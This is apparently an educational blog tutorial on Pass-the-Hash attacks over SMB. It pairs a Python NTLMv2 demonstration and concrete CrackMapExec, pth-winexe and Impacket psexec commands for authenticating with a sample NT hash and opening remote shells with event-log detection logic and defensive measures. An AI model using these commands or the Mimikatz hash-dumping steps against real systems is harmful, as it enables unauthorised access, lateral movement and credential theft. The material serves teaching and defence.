10 Sep, 2025
Pass-the-Hash (PtH) Attacks via SMB: A Complete Q&A Tutorial for Cybersecurity Students

What if a cyber expert told you that attackers don't always need your actual password to break in? With just the hash of the password, an attacker can "pass" it directly to SMB and walk through doors across the network with nothing in the way. With a technique called Pass-the-Hash (PtH) via SMB, attackers reuse stolen NTLM hashes to move between systems, gain admin access, and spread malware without ever learning the real password.

So, want to know how to defend against it? Let's dive into the tutorial step by step.

What is a Pass-the-Hash (PtH) Attack?

Let's make it simple and clear. In a Pass-the-Hash attack, the attacker authenticates to a remote service (such as SMB) using the NTLM hash of a password instead of the password itself.

Please note:

Instead of cracking the password, the attacker reuses the NTLM hash as-is. The NTLM authentication protocol allows this because the challenge-response it sends over the wire is computed from the NT hash, never from the plaintext: whoever holds the hash holds the credential.

Real-world analogy:

Imagine, you have to enter your office premises following a key card system. Normally, you need the actual key card (password). But someone finds a way to copy just the magnetic strip data (hash) and reuse it on another card. They never saw the original, but they can still unlock doors.

Why Do Attackers Use SMB for Pass-the-Hash?

  • SMB (Server Message Block) is a Windows protocol utilised for file sharing, printer sharing, and inter-process communication.
  • SMB often runs on TCP 445, accessible across networks.
  • NTLM authentication (used by SMB) derives its challenge-response from the NT hash, so the hash alone is enough to authenticate.
  • Many organizations still allow SMB internally → perfect for lateral movement.

Remember, if an attacker compromises one system, they can steal hashes and spread across the network with SMB.
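To make the point concrete, here is an added example (not code from the original tutorial) that walks through the NTLMv2 challenge-response keyed only by the NT hash, and shows why the hash this tutorial reuses later, 8846f7eaee8fb117ad06bdd830b7586c, is simply MD4 over the UTF-16LE encoding of "password". It serves both the note above on why NTLM accepts hashes and the bullet on NTLM authentication. The server challenge, client challenge, timestamp and target-info bytes are constructed placeholders for what a real CHALLENGE message would carry, and the MD4 routine is written out because hashlib's md4 is often disabled on current OpenSSL builds.

```python
import hashlib
import hmac
import struct


# --- NT hash = MD4(UTF-16LE(password)) --------------------------------------
# Pure-Python MD4 (RFC 1320); avoids depending on hashlib.new("md4"), which
# many OpenSSL 3 builds refuse to provide.
def md4(data: bytes) -> bytes:
    mask = 0xFFFFFFFF

    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & mask

    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        v = state[:]
        for fn, k, shifts, order in rounds:
            for i, xi in enumerate(order):
                t = (4 - i % 4) % 4                  # target word rotates a, d, c, b
                v[t] = rotl((v[t] + fn(v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4])
                             + x[xi] + k) & mask, shifts[i % 4])
        state = [(s + w) & mask for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


# --- NTLMv2 challenge-response (MS-NLMP 3.3.2), keyed only by the NT hash ----
def ntowf_v2(nt: bytes, user: str, domain: str) -> bytes:
    return hmac.new(nt, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def client_response(nt: bytes, user: str, domain: str, server_challenge: bytes,
                    client_challenge: bytes, filetime: int, target_info: bytes) -> bytes:
    """What the client sends back: NTProofStr || temp. The password never appears."""
    temp = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", filetime)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)
    proof = hmac.new(ntowf_v2(nt, user, domain), server_challenge + temp, hashlib.md5).digest()
    return proof + temp


def server_verify(stored_nt: bytes, user: str, domain: str,
                  server_challenge: bytes, response: bytes) -> bool:
    """The server recomputes the proof from the NT hash it stores and compares."""
    proof, temp = response[:16], response[16:]
    expected = hmac.new(ntowf_v2(stored_nt, user, domain),
                        server_challenge + temp, hashlib.md5).digest()
    return hmac.compare_digest(proof, expected)


# --- Worked exchange using the hash quoted in this tutorial -------------------
STOLEN_NT_HEX = "8846f7eaee8fb117ad06bdd830b7586c"
# Constructed placeholders for the CHALLENGE-message fields (not captured traffic).
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
CLIENT_CHALLENGE = bytes.fromhex("fedcba9876543210")
FILETIME = 0x01DC2A1B7D7E6C00                                  # arbitrary Windows FILETIME
TARGET_INFO = b"\x02\x00\x06\x00" + "LAB".encode("utf-16le") + b"\x00\x00\x00\x00"  # NbDomainName + EOL


def pass_the_hash(nt_hex: str, user: str = "administrator", domain: str = "LAB") -> bool:
    """Attacker side: the stolen hash goes straight into the protocol, no nt_hash() call."""
    response = client_response(bytes.fromhex(nt_hex), user, domain, SERVER_CHALLENGE,
                               CLIENT_CHALLENGE, FILETIME, TARGET_INFO)
    # Server side holds the account's NT hash (here the hash of "password").
    return server_verify(nt_hash("password"), user, domain, SERVER_CHALLENGE, response)


if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password").hex())
    print("PtH with stolen hash accepted:", pass_the_hash(STOLEN_NT_HEX))
    print("PtH with wrong hash accepted: ", pass_the_hash("00" * 16))
```

Note that nothing in `client_response` needs the plaintext: the only secret input on either side is the 16-byte NT hash, which is why stealing it is as good as stealing the password, and why a 40-character passphrase gives no extra protection once its hash has leaked.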

What Tools Are Commonly Used for PtH Attacks?

When it comes to penetration testing and cyberattacks, these tools are the go-to weapons:

  • Mimikatz: To dump NTLM hashes from memory.
  • CrackMapExec (CME): To automate SMB authentication and execution.
  • pth-winexe: remote command execution using hashes.
  • Impacket Toolkit (Python scripts like psexec.py, wmiexec.py): flexible exploitation.

This tutorial focuses on Mimikatz, CrackMapExec and pth-winexe.

How Do Attackers Get NTLM Hashes in the First Place?

There are several common methods:

  1. Local Hash Dumping (Mimikatz, pwdump, secretsdump.py).
    Run on a compromised Windows host.
  2. Network Capture (Responder, Inveigh).
    Poisoning LLMNR/NBT-NS to trick victims into sending NTLM hashes.
  3. Database Extraction
    Copying the SAM (Security Accounts Manager) hive together with the SYSTEM hive needed to decrypt it, or NTDS.dit from a domain controller.
  4. Credential Dumping Tools
    Sysinternals ProcDump + LSASS dump → analyze with Mimikatz.

Can You Show How to Dump a Hash with Mimikatz?

Yes. On a compromised Windows host where you hold local admin rights, run Mimikatz and use its sekurlsa module to read the logon credentials cached in LSASS memory:

[Screenshot: Mimikatz command dumping NTLM hashes from LSASS]

After this, you will see output like:

[Screenshot: Mimikatz output listing the user's NTLM hash]

This NTLM hash is what attackers will reuse in the Pass-the-Hash attack.

How Do I Use This Hash in a PtH Attack?

Method 1: CrackMapExec (CME)

Run this on Kali Linux:
crackmapexec smb <target_IP> -u administrator -H 8846f7eaee8fb117ad06bdd830b7586c

If valid, you will see:
[+] Authentication successful

To execute a command remotely:
crackmapexec smb <target_IP> -u administrator -H 8846f7eaee8fb117ad06bdd830b7586c -x "ipconfig"

Method 2: pth-winexe (Direct Shell)

pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c //<target_IP> cmd.exe

  • This opens a remote command shell.
  • From here, you can browse files, run commands, or dump more credentials.

An essential reminder: the picture is different on Windows 11. There, Microsoft Defender typically detects and neutralizes this attack automatically, so expect it to fail in an up-to-date lab unless Defender is disabled. Also note that on any modern Windows version, UAC remote restrictions give network logons by local Administrators-group accounts other than the built-in RID-500 Administrator a filtered token, so remote execution fails unless LocalAccountTokenFilterPolicy has been set to 1.

Method 3: Impacket's psexec.py

psexec.py WIN-SERVER/administrator@<target_IP> -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c

  • Creates a remote interactive shell.
  • Popular among red-teamers because it mimics real attacks closely.

What Happens After a Successful PtH Attack?

  • The attacker gains remote admin access.
  • Possible next steps:
    • Steal sensitive files.
    • Pivot to other systems.
    • Dump more credentials.
    • Deploy ransomware.

In real-world breaches (e.g., the NotPetya outbreak), credential theft from LSASS combined with remote execution over PsExec/WMI was key to rapid, worm-like spreading.

Why Are PtH Attacks So Dangerous?

  • Attackers don't need plaintext passwords.
  • Works even if the password is long and complex: once the hash has leaked, password strength no longer matters.
  • Reusable across multiple systems if the same password (and therefore the same hash) is set on them.
  • Very stealthy if not monitored carefully, because on the wire it is just another NTLM logon.

How Can I Detect a PtH Attack?

Windows Event Logs

  • Event ID 4624 (Logon Success) with Logon Type 3 (network) and Authentication Package NTLM; on domain controllers, Event ID 4776 records the NTLM credential validation.
  • Event ID 4625 (Failed Logon) → repeated failed NTLM attempts.

Indicators of Compromise (IOCs)

  • The same account authenticating by NTLM to many different systems from one source host in a short window (the hash itself never appears in logs, so look for the pattern of its reuse).
  • Admin accounts logging in from unusual hosts.
  • Abnormal SMB session spikes.

Security Tools

  • SIEM solutions (Splunk, ELK, Sentinel) with custom rules.
  • EDR tools that monitor LSASS access.
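The two log-based indicators above can be turned into a simple detection. The following is an added example, not part of the original tutorial or any SIEM product, that runs over a constructed CSV export of 4624 events (the column names follow the event's XML fields; the rows are invented, not real logs). The admin account list and the allowed admin source addresses are assumptions for the example.

```python
import csv
import io
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of 4624 events exported as CSV. Not real logs: rows 2-5
# model an attacker at 10.0.0.50 passing the administrator hash to four hosts
# within two minutes; the last row is a legitimate admin logon from a jump host.
SAMPLE_4624 = """\
TimeCreated,Computer,TargetUserName,LogonType,AuthenticationPackageName,IpAddress
2025-09-10T09:00:05,WS01,jdoe,3,Kerberos,10.0.0.21
2025-09-10T09:01:10,FS01,administrator,3,NTLM,10.0.0.50
2025-09-10T09:01:42,WS02,administrator,3,NTLM,10.0.0.50
2025-09-10T09:02:15,WS03,administrator,3,NTLM,10.0.0.50
2025-09-10T09:03:01,DC01,administrator,3,NTLM,10.0.0.50
2025-09-10T09:05:00,FS01,svc_backup,3,NTLM,10.0.0.30
2025-09-10T09:30:00,DC01,administrator,3,NTLM,10.0.0.10
"""

# Assumptions for this example: which accounts count as admin, and the
# addresses (jump host / PAW) that admins are expected to log on from.
ADMIN_ACCOUNTS = {"administrator"}
ADMIN_SOURCES = {"10.0.0.10"}


def parse_events(text: str) -> list:
    events = []
    for row in csv.DictReader(io.StringIO(text)):
        row["TimeCreated"] = datetime.fromisoformat(row["TimeCreated"])
        row["LogonType"] = int(row["LogonType"])
        events.append(row)
    return sorted(events, key=lambda e: e["TimeCreated"])


def detect_pth(events: list, window: timedelta = timedelta(minutes=10), fanout: int = 3) -> list:
    """Return alert tuples for NTLM network logons that look like hash reuse.

    Rule ntlm_fanout: one account from one source IP authenticates by NTLM
    (4624, LogonType 3) to `fanout` or more distinct hosts inside `window`.
    Rule unusual_admin_source: an admin account logs on by NTLM from a source
    outside ADMIN_SOURCES. Each rule fires once per (account, source) pair.
    """
    alerts = []
    recent = defaultdict(deque)   # (user, src_ip) -> deque of (time, target host)
    flagged = set()
    for ev in events:
        # PtH over SMB shows up as an NTLM network logon; Kerberos and
        # interactive logons are not what this detection is after.
        if ev["LogonType"] != 3 or ev["AuthenticationPackageName"] != "NTLM":
            continue
        key = (ev["TargetUserName"].lower(), ev["IpAddress"])
        q = recent[key]
        q.append((ev["TimeCreated"], ev["Computer"]))
        while q and ev["TimeCreated"] - q[0][0] > window:   # drop events outside the window
            q.popleft()
        hosts = {host for _, host in q}
        if len(hosts) >= fanout and ("ntlm_fanout",) + key not in flagged:
            flagged.add(("ntlm_fanout",) + key)
            alerts.append(("ntlm_fanout", key[0], key[1], len(hosts)))
        if (key[0] in ADMIN_ACCOUNTS and key[1] not in ADMIN_SOURCES
                and ("unusual_admin_source",) + key not in flagged):
            flagged.add(("unusual_admin_source",) + key)
            alerts.append(("unusual_admin_source", key[0], key[1]))
    return alerts


def run_sample() -> list:
    return detect_pth(parse_events(SAMPLE_4624))


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

In production the same logic would be fed from a SIEM query or `Get-WinEvent` export rather than an inline string, and the fan-out threshold and window should be tuned against a baseline of normal admin activity so that backup and scanning service accounts do not page you every night.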

How Can I Defend Against Pass-the-Hash?

1. Prevent Hash Theft

  • Enable Credential Guard (Windows 10/11).
  • Restrict LSASS memory dumping (enable LSA Protection, i.e. RunAsPPL, and alert on processes opening a handle to LSASS).
  • Block tools like Mimikatz via EDR.

2. Limit Hash Reuse

  • Implement Local Administrator Password Solution (LAPS) → randomize local admin passwords.
  • Don't reuse admin credentials across multiple systems.

3. Reduce Attack Surface

  • Restrict or disable NTLM authentication (audit NTLM use first, set LmCompatibilityLevel to refuse LM and NTLMv1 responses, and move workloads to Kerberos).
  • Limit SMB exposure (block TCP 445 externally).
  • Use firewall segmentation between sensitive hosts.

4. Monitor & Alert

  • SIEM rules for unusual NTLM logons.
  • Detect hash reuse across systems.

What Should Cybersecurity Students Take Away?

  • Pass-the-Hash = Real Threat: It's widely used by ransomware gangs and APT groups.
  • Practical Skill: Learn to perform PtH in a lab → then learn to detect it in logs.
  • Defender's Mindset: Passwords alone aren't enough — securing hashes is critical.

So, Pass-the-Hash isn't just a "lab exercise." It's a real weapon attackers use to leapfrog across networks and bring entire enterprises to their knees. If you can run it in your lab, so can a threat actor in your network. The only difference between a red-team drill and a breach headline is whether you take defense seriously - because hashes are credentials.

Don't just learn the attack. Master the defense. Every hash you protect is one door you keep locked!
